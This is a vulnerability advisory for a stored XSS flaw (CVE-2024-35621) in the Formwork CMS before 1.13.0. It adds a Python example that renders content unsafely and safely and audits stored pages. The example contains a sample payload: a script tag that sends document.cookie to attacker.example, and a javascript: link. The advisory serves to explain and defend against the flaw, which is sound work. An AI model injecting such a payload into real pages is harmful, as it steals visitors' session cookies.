PT-2024-26571 · Formwork · Formwork

Kyokito1412 · Published 2024-05-28 · Updated 2024-05-28 · CVE-2024-35621

CVSS v3.1: 4.8 (Medium)
Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: Formwork versions prior to 1.13.0

Description: A stored cross-site scripting (XSS) vulnerability allows an authenticated attacker to execute arbitrary web scripts or HTML in site visitors' browsers via a crafted payload injected into the Content field. Formwork rendered raw HTML contained in Markdown fields without escaping it, so a user with access to the administration panel and page-editing permissions could insert <script> tags (or links with dangerous schemes such as javascript:) into page content; that markup was then emitted unchanged on the publicly accessible site pages and executed for every visitor. The attack requires a highly privileged account (PR:H) and a victim who views the page (UI:R), but its impact crosses from the administration panel to the public site (S:C), which is why the vector carries a changed scope despite the low confidentiality and integrity ratings.

Recommendations: For versions prior to 1.13.0, update to Formwork 1.13.0 or later, which patches this vulnerability by introducing the content.safeMode system configuration option that controls whether HTML tags and potentially dangerous links in page content are escaped. Because the option controls the behaviour rather than removing it, confirm after upgrading that it is enabled; turning it off restores the unescaped rendering. As a temporary workaround, restrict access to the administration panel to a controlled group of trusted editors to minimize the risk of exploitation.
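The following is an added example for this advisory, not Formwork's code: a deliberately tiny Markdown renderer (inline [text](url) links only, no other Markdown syntax) that contrasts the pre-1.13.0 behaviour described above, where raw HTML in the Content field is copied into the public page, with a "safe mode" that escapes HTML and drops links whose scheme is not allow-listed, which is the class of fix the advisory describes. The payload, the SAFE_SCHEMES allow-list and the audit helper for already-stored pages are constructed assumptions for illustration; Formwork's real Markdown engine and option semantics may differ.

```python
"""Added example for this advisory (not Formwork's code): a deliberately tiny
Markdown renderer (inline [text](url) links only) that shows the pre-1.13.0
behaviour, raw HTML passed through to the public page, beside a "safe mode"
that escapes HTML and neutralises links with dangerous schemes."""
import html
import re
from urllib.parse import urlsplit

# Constructed payload of the kind an editor could paste into the Content field.
PAYLOAD = (
    "Welcome! <script>fetch('https://attacker.example/?c='+document.cookie)</script> "
    "[click me](javascript:window.location='https://attacker.example')"
)

# Inline Markdown link: [text](url); the url stops at ')' or whitespace.
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^)\s]*)\)")
# Inline raw HTML tag (what a Markdown renderer passes through unchanged).
TAG_RE = re.compile(r"<[A-Za-z/][^>]*>")
# Link schemes allowed in user-authored content (assumption for this example;
# "" covers relative and protocol-relative URLs).
SAFE_SCHEMES = {"", "http", "https", "mailto"}


def render_unsafe(markdown: str) -> str:
    """Vulnerable rendering: links are converted, everything else is copied
    verbatim, so <script> tags and javascript: hrefs reach the page intact."""
    return LINK_RE.sub(lambda m: f'<a href="{m.group(2)}">{m.group(1)}</a>', markdown)


def is_safe_url(url: str) -> bool:
    """Allow-list the scheme. Browsers ignore embedded whitespace and control
    characters when parsing a scheme, so strip them before classifying."""
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    try:
        return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES
    except ValueError:  # malformed URL (e.g. bad IPv6 brackets): treat as unsafe
        return False


def render_safe(markdown: str) -> str:
    """Hardened rendering: all text is HTML-escaped (so a literal <script> tag
    becomes visible text, not markup) and a link whose scheme is not
    allow-listed is emitted as plain text with no href at all."""
    out, pos = [], 0
    for m in LINK_RE.finditer(markdown):
        out.append(html.escape(markdown[pos:m.start()]))
        text, url = html.escape(m.group(1)), m.group(2)
        if is_safe_url(url):
            out.append(f'<a href="{html.escape(url, quote=True)}">{text}</a>')
        else:
            out.append(text)
        pos = m.end()
    out.append(html.escape(markdown[pos:]))
    return "".join(out)


def audit_content(markdown: str) -> list[str]:
    """Review helper for already-stored pages: list raw HTML tags and links with
    non-allow-listed schemes that the unsafe renderer would have emitted as-is."""
    findings = [f"raw html: {m.group(0)}" for m in TAG_RE.finditer(markdown)]
    findings += [
        f"dangerous link: {m.group(2)}"
        for m in LINK_RE.finditer(markdown)
        if not is_safe_url(m.group(2))
    ]
    return findings


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD))
    print("safe:  ", render_safe(PAYLOAD))
    for finding in audit_content(PAYLOAD):
        print("audit: ", finding)
```

The safe path escapes before it builds markup rather than trying to strip known-bad tags, and it allow-lists link schemes instead of deny-listing javascript:, so case tricks and new schemes fail closed. The audit helper is the check a practitioner would run over content written before the upgrade, since escaping at render time only protects pages that are rendered with the safe option enabled.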

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2024-35621
GHSA-GX8M-F3MP-FG99

Affected Products

Formwork